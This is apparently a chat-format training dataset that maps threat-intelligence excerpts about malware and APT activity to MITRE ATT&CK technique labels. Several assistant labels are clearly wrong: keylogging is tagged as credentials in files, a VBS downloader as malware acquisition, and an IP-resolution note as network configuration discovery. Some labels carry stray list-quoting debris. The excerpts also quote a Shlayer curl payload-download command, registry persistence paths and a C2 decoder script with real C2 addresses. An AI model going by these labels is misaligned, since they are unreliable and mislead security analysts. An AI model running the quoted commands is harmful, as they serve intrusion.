"role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wrote indicators based on observed attacker activity • Identified lateral movement, unique backdoors, credential theft, data theft, recon, persistence creation, etc" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can retrieve IP and network adapter configuration information from compromised hosts." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Confucius has exploited Microsoft Office vulnerabilities, including CVE-2015-1641, CVE-2017-11882, and CVE-2018-0802." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "schedules the execution one of its modules by creating a new scheduler task." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN4 has lured victims to click malicious links delivered via spearphishing emails (often sent from compromised accounts)." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "commonly created Web shells on victims' publicly accessible email and web servers, which they used to maintain access to a victim network and download additional malicious files." }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AutoIt backdoor is capable of identifying documents on the victim with the following extensions: .doc; .pdf, .csv, .ppt, .docx, .pst, .xls, .xlsx, .pptx, and .jpeg." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This final payload is the ThreatNeedle loader running in memory. In addition, the malware saves the configuration data as a registry key encrypted in RC4" }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "yty runs \"ipconfig /all\" and collects the domain name." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CHOPSTICK checks for antivirus and forensics software." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Indrik Spider has used malicious JavaScript files for several components of their attack." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWRUNER can capture a screenshot from a victim." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot module shareDll/mshareDll discovers network shares via the WNetOpenEnumA API." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoisonIvy stages collected data in a text file." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The SombRAT loader recovered in this incident was a 64-bit variant that allowed the malicious actor to remotely download and load executable dynamic-link libraries (DLL) plugins on the affected system (Ingress Tool Transfer [T1105]). The loader used hardcoded public RSA keys for command and control (C2) sessions (Command and Control [TA0011]). The C2 communications were encrypted using Advanced Encryption Standard (AES), resulting in a Secure Sockets Layer tunnel with the threat actors (Encrypted Channel: Asymmetric Cryptography [T1573.002" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The loader performs a last check to ensure that the operating systems keyboard and language settings are not set to Russian and creates a mutex with a hardcoded name ‘ld_201127’. The latter is to avoid double execution of its own instance" }, { "role": "assistant", "content": "T1614.001 - System Location Discovery: System Language Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The actor has distributed its dropper embedded in an archive file (외교부 가판 2021-05-07.zip) as an attachment through spearphishing emails. The archive file contains a JavaScript file (외교부 가판 2021-05-07.pdf.jse) which pretends to be a PDF file that contains two Base64 encoded blobs. The first one is the content of the decoy PDF file in Base64 format and the other one contains the AppleSeed payload also in Base64 format (encoded twice" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 added their own devices as allowed IDs for active sync using \"Set-CASMailbox\", allowing it to obtain copies of victim mailboxes. It also added additional permissions (such as Mail.Read and Mail.ReadWrite) to compromised Application or Service Principals." }, { "role": "assistant", "content": "T1098.002 - Account Manipulation: Additional Email Delegate Permissions" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SPACESHIP identifies files and directories for collection by searching for specific file extensions or file modification time." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Dust Storm, the threat actors used Visual Basic scripts." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Similar to many other ransomware operators, CARBON SPIDER not only encrypted victim files using Darkside, but also exfiltrated data for publication on a dedicated leak site (DLS) hosted on Tor. Further, CARBON SPIDER frequently conducted hypervisor jackpotting by encrypting ESXi servers using a version of Darkside specifically designed for ESXi" }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "drops a signed Microsoft DLL to disk." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can obtain network information, including DNS, IP, and proxies." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Exaramel for Windows has a command to launch a remote shell and executes commands on the victim’s machine." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Since the discovery of the {A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll backdoor and its public analysis by multiple researchers, we observed some changes in the malware’s configuration data. First, the authors started removing the names from the helper DLLs (DNSprov.dll and the two versions of HttpProv.dll). Then the operators stopped packaging the third DLL (second version of HttpProv.dll), choosing to embed just one" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bad Rabbit has used an executable that installs a modified bootloader to prevent normal boot-up." }, { "role": "assistant", "content": "T1495 - Firmware Corruption" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects the current username and sends it to the C2 server." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Nefilim ransomware creates a new wermgr.exe (the Windows error reporting manager) process and injects its payload to evade process-based defenses." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clambling can determine the current time." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To ensure its victim will use IE, it will terminate any process in-focus that is Chrome or Firefox, in hopes the victim will believe the browsers are “malfunctioning.” Whenever a victim uses IE and browses to specific Brazilian banks or businesses, the malware will only then begin to log keystrokes" }, { "role": "assistant", "content": "T1552.001 - Unsecured Credentials: Credentials In Files" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QAKBOT can use VBS to download and execute malicious files" }, { "role": "assistant", "content": "T1588.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has harvested data from remote mailboxes including through execution of \"\\\\\\c$\\Users\\\\AppData\\Local\\Microsoft\\Outlook*.ost\"." }, { "role": "assistant", "content": "T1114.002 - Email Collection: Remote Email Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN4 has used Tor to log in to victims' email accounts." }, { "role": "assistant", "content": "T1090.003 - Proxy: Multi-hop Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LiteDuke has the ability to check for the presence of Kaspersky security software." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Russian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tarrask leverages token theft to obtain `lsass.exe` security permissions." }, { "role": "assistant", "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Old Comnie Variant C2 Decoder 12345678910111213141516171819 import requestsimport sysimport redef decode(data):  o = \"\"  for c in data:    if c == \"*\":      o += \".\"    elif c == \"|\":      o += \":\"    elif c == \"+\":      o += \";\"    else:      o += chr(ord(c)-49)  return or = requests.get(sys.argv[1])fd = r.textdata = fd.split(\"++a++\")[1].split(\"++a++\")[0]print(decode(data))   Samples Analyzed eed5945c36ba22a2531dd2d9dd7bc4e17e68544d512be75670919caf287c1b4a 8026442b812469e48ccd11611ab6eacdcb312a8f1aabd563b7f4cb4868315e16 c8951038fd53321661274e5a12532c3fb6f73c75fd75503a1089c56990658fef 48a1ce103e5bf47c47cc5ed40b2dc687ebaf3674d667419287bcb1d0b8d8dda6 e06b797a24fa03a77e0d5f11b0cf0f4f038e0a9ea04d4981d39148969349c79c 7282d0709449abe16457864f58157cac8d007571dc5d463d393d1ae2605d17e0 bf6ee8426245b167a69292e513c0841d818b310dda87daea649221f4e0afd1b3 62b98dde60cb4dd0d0088bde222c5c2c4c92560cccf4753f1ce94e044093ab85 756952652290ad09fe03c8674d44eab2077b091398187c3abcb6f1ddc462c32d 639a49390c6f8597d36ec0bd245efa1b4a078c0506fb515e577a40389b39a614 29ed6eb3c882b018c2bb6bf2f8eb15069dc5510ca119abebf24f09e3c91f10aa 0e8a4e4d5ca501bad25a730fb5de534fa324c6ac23e0a573524693f2d996d105 316a0c6849f183a1a52d0c7648e722c4ca85bd57b0804a147c0c8656b84bbdb9   Identified C2s 121.126.211[.]94:8080 113.196.70[.]11:80,8080 133.130.101[.]47:443 123.51.208[.]157:443;8000;8080   C2 Hosting URLs (DDR URLs) github[.]com/korlee5643 itsmonsee.tumblr[.]com allworldnewsway.blogspot[.]com" }, { "role": "assistant", "content": "T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The WannaCry malware consists of two distinct components, one that provides ransomware functionality and a component used for propagation, which contains functionality to enable SMB exploitation capabilities" }, { "role": "assistant", "content": "T1210 - Exploitation of Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleJeus has loaded a plist file using the \"launchctl\" command." }, { "role": "assistant", "content": "T1569.001 - System Services: Launchctl" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has registered algorithmically generated Twitter handles that are used for C2 by malware, such as HAMMERTOSS." }, { "role": "assistant", "content": "T1583.006 - Web Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Backdoor.Oldrea collects information about the Internet adapter configuration." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The actor's CovalentStealer tool stores collected files on a Microsoft OneDrive cloud folder." }, { "role": "assistant", "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It executes the other modules and collects initial information about the machine, including information about the network, locale, and the keyboard language" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DanBot has been distributed within a malicious Excel attachment via spearphishing emails." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Octopus has uploaded stolen files and data from a victim's machine over its C2 channel." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Socksbot can write and execute PowerShell scripts." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has sent spearphising emails with malicious attachments to potential victims using compromised and/or spoofed email accounts." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The vulnerability tracked as CVE-2022-41352 is a remote code execution flaw that allows attackers to send an email with a malicious archive attachment that plants a web shell in the ZCS server while, at the same time, bypassing antivirus checks." }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell', 'T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire includes various modules for finding files of interest on hosts and network shares." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SDBbot has the ability to decrypt and decompress its payload to enable code execution." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LookBack uses a custom binary protocol over sockets for C2 communications." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of persisting via the Registry Run key or a .lnk file stored in the Startup directory." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pisloader uses DNS as its C2 protocol." }, { "role": "assistant", "content": "T1071.004 - Application Layer Protocol: DNS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pupy can sniff plaintext network credentials and use NBNS Spoofing to poison name services." }, { "role": "assistant", "content": "T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The source code only considers the following machine types:default: lpString = \"(Other)\"; break;case 0x02: lpString = \"(Unknown)\"; break;case 0x03: lpString = \"(Desktop)\"; break;case 0x04: lpString = \"(Low Profile Desktop)\"; break;case 0x06: lpString = \"(Mini Tower)\"; break;case 0x07: lpString = \"(Tower)\"; break;case 0x08: lpString = \"(Portable)\"; break;case 0x09: lpString = \"(Laptop)\"; break;case 0x0A: lpString = \"(Notebook)\"; break;case 0x0E: lpString = \"(Sub Notebook)\"; break;The string format - with the () - and the considering types are exactly the same as those used in the ROKRAT samples.It's interesting to note that this reconnaissance phase was not included in the ROKRAT variant used during the \"Golden Time\" campaign.Brower StealerFor the first time, the ROKRAT sample used during the \"North Korean Human Rights\" contained a browser credentials stealer" }, { "role": "assistant", "content": "T1008 - Fallback Channels', 'T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Torisma has used various Windows API calls." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ramsay can use \"netstat\" to enumerate network connections." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has copied its backdoor across open network shares, including ADMIN$, C$WINDOWS, D$WINDOWS, and E$WINDOWS." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has used multiple software exploits for common client software, like Microsoft Word, Exchange, and Adobe Reader, to gain code execution." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Examining historical IP resolutions revealed a common IP between the active nameservers, 107.175.75[.]123" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used a tool to capture screenshots." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OSX/Shlayer can use bash scripts to check the macOS version, download payloads, and extract bytes from files. OSX/Shlayer uses the command \"sh -c tail -c +1381...\" to extract bytes at an offset from a specified file. OSX/Shlayer uses the \"curl -fsL \"$url\" >$tmp_path\" command to download malicious payloads into a temporary directory." }, { "role": "assistant", "content": "T1059.004 - Command and Scripting Interpreter: Bash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT1 hijacked FQDNs associated with legitimate websites hosted by hop points." }, { "role": "assistant", "content": "T1584.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Agent Tesla can access the victim’s webcam and record video." }, { "role": "assistant", "content": "T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lucifer can persist by setting Registry key values \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\QQMusic\" and \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\QQMusic\"." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DnsSystem can write itself to the Startup folder to gain persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PUNCHBUGGY can gather system information such as computer names." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sidewinder has used malware to collect information on network interfaces, including the MAC address." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Prikormka contains a module that collects documents with certain extensions from removable media or fixed drives connected via USB." }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathers file and directory information from the victim’s machine." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PcShare can obtain the proxy settings of a compromised machine using `InternetQueryOptionA` and its IP address by running `nslookup myip.opendns.comresolver1.opendns.com\\r\\n`." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has exploited CVE-2021-36934 to escalate privileges on a compromised host." }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can set its \"beacon\" payload to reach out to the C2 server on an arbitrary and random interval. In addition it will break large data sets into smaller chunks for exfiltration." }, { "role": "assistant", "content": "T1029 - Scheduled Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The third campaign deployed a different custom RPC backdoor to that used in the second campaign. This backdoor used code derived from the publicly available PowerShellRunner tool to execute PowerShell scripts without using powershell.exe. This was probably done to avoid them being written to the file system" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery', 'T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The attackers used the famous Mimikatz credential dumping tool as their main tool to obtain credentials including user passwords, NTLM hashes and Kerberos tickets. Mimikatz is a very popular tool and is detected by most antivirus vendors and other security products. Therefore, the attackers used over 10 different customized Mimikatz payloads, which were obfuscated and packed in a way that allowed them to evade antivirus detection" }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gh0st RAT uses RC4 and XOR to encrypt C2 traffic." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware communicates through the use of events in Google Calendar." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A configuration file resides in a file under the backdoor’s installation directory with the .bin extension. It contains commands in the same form as those listed in Table 2 that are automatically executed by the backdoor when it is started. These commands are also executed when the loadconfig command is issued. This file can be likened to a startup script for the backdoor. The state command sets a global variable containing a series of Boolean values represented as ASCII values ‘0’ or ‘1’ and also adds itself to the configuration file. Other than the state command, all commands in the configuration file are identified by their hash’s decimal value instead of their plain text name. Certain commands, when executed, add themselves to the configuration so they will persist across (or be part of) reboots. The loadconfig and state commands are executed during initialization, effectively creating the configuration file if it does not exist and writing the state command to it" 